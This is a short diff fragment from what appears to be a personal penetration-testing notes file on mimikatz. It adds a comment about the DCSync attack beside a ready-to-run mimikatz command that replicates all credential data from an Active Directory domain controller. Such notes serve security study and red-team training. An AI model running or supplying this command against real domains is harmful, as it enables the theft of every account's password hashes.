amandaguglieri/hackinglife/docs/mimikatz.md

 ########################################
 # DCSync (replicate AD password database)
 ########################################
+# If we have the privilege "Replicating Directory Changes" we can execute the DCSync attack:
 # Replicate domain credential data from domain controller
 .\mimikatz.exe  "token::elevate" "lsadump::dcsync /domain:<DomainFQDN> /all" "exit"